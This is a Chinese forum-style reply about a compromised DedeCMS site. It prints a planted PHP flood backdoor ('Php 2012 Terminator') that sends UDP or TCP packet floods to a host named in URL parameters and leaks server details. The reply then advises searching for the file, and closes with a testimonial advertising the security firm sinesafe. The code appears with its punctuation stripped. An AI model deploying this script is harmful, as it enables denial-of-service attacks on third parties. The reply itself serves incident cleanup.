嗯,dede 最近漏洞比较多,我之前也遇到过,程序影藏的很深,我之前的是在 /include/js/jquery/article_aee.php
这个文件,当然可能文件位置有所变动,但发包的代码可能不会变,你全站搜索下看有没有这段代码:
<?phpset_time_limit(86400)
ignore_user_abort(True)
$packets = 0
$http = $_GET['http']
$rand = $_GET['exit']
$exec_time = $_GET['time']
if (StrLen($http)==0 or StrLen($rand)==0 orStrLen($exec_time)==0)
{
if(StrLen($_GET['rat'])<>0)
{
echo$_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']
exit
}
echo "Php 2012 Terminator"
exit
}
for($i=0$i<65535$i++)
{
$out .= "X"
}
//Udp1-fsockopen Udp2 pfsockopen Tcp3CC.center
$max_time = time()+$exec_time
if($rand==53)
while(1)
{
$packets++
if(time() > $max_time)
{
break
}
$fp = fsockopen("udp://$http",$rand, $errno, $errstr, 5)
if($fp)
{
fwrite($fp, $out)
fclose($fp)
}
}
else
if($rand==500)
while(1)
{
$packets++
if(time() > $max_time){
break
}
$fp = pfsockopen("udp://$http",$rand, $errno, $errstr, 5)
if($fp)
{
fwrite($fp, $out)
fclose($fp)
}
}
else
while(1)
{
$packets++
if(time() > $max_time){
break
}
$fp = pfsockopen("tcp://$http",$rand, $errno, $errstr, 5)
if($fp)
{
fwrite($fp, $out)
fclose($fp)
}
}
?>
这个代码 就是对我发包的,通过url 请求 带参数 对外发包,希望对你所有帮助!
你最好也登陆FTP看下,有没有最近上传的文件,对最近服务器里面出现的文件进行排查,相信你也会找到病毒程序的。
我以前也遇到过这种情况当时是服务器向外发包,流量占到了%100,当时机房都没有办法解决,无奈之下朋友告诉我,叫sinesafe来着他们专业做服务器安全和网站安全,我找了他们后,就把这个php dos攻击给解决了,他们给我说了原因是我服务器中一个PHP网站因为程序漏洞被黑客利用了,然后发动了 php dos攻击,和sinesafe合作了半年,服务器非常稳定安全,在也没遇到流量像外发包的攻击,真的很感谢他们,希望我的经历,能给大家尽量带来最少的损失。欢迎分享,转载请注明来源:夏雨云
评论列表(0条)